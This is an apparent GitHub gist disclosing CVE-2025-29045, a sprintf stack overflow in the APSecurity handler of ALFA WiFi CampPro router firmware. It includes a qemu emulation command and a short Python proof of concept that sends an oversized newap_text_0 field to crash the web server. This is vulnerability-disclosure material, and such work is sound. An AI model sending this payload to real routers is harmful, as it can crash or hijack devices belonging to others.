Skip to content

Instantly share code, notes, and snippets.

@xyqer1

xyqer1/ALFA-WiFi-CampPro-APSecurity-newap_text_0.md

Last active April 17, 2025 09:07
Show Gist options
  • Save xyqer1/16f6b44ef062374bc32c12952c7b81f8 to your computer and use it in GitHub Desktop.
Save xyqer1/16f6b44ef062374bc32c12952c7b81f8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ALFA-WiFi-CampPro-APSecurity-newap_text_0.md

ALFA WiFi CampPro-APSecurity-newap_text_0

Vulnerability Details

  • Affected Firmware: ALFA_CAMPRO-co-2.29
  • CVE-ID: CVE-2025-29045
  • Root Cause: By analyzing the goahead file in the bin directory, I found that the function APSecurity contains a stack overflow vulnerability.
  • Impact: Remote unauthenticated attackers can hijack the program's control flow.

Vendor Information

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the ALFA WiFi CampPro router.

By analyzing the goahead file in the bin directory, I found that the function APSecurity contains a stack overflow vulnerability.

The stack overflow can be triggered by the newap_text_0 key value, which leads to a sprintf stack overflow.

image-20250305165144246

How can we simulate a router

Use the following command to simulate with qemu-mipsel-static.

sudo qemu-mipsel-static -L ./ ./bin/goahead

The content of the poc.py file is as follows:

import requests
url = "http://127.0.0.1/goform/APSecurity"
data = {
        "ssidIndex": "0",
        "newap_text_0":"a"*0x900,
        "security_mode":"WPA2"
}

res = requests.post(url,data=data)
print(res.text)

Attack result

image-20250305165917875

One can see that his stack space is 0x838.

image-20250305165839301

After execution, it overflows to 0x0x938. If you want to overflow more, you can modify the newap_text_0 key value in the code.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment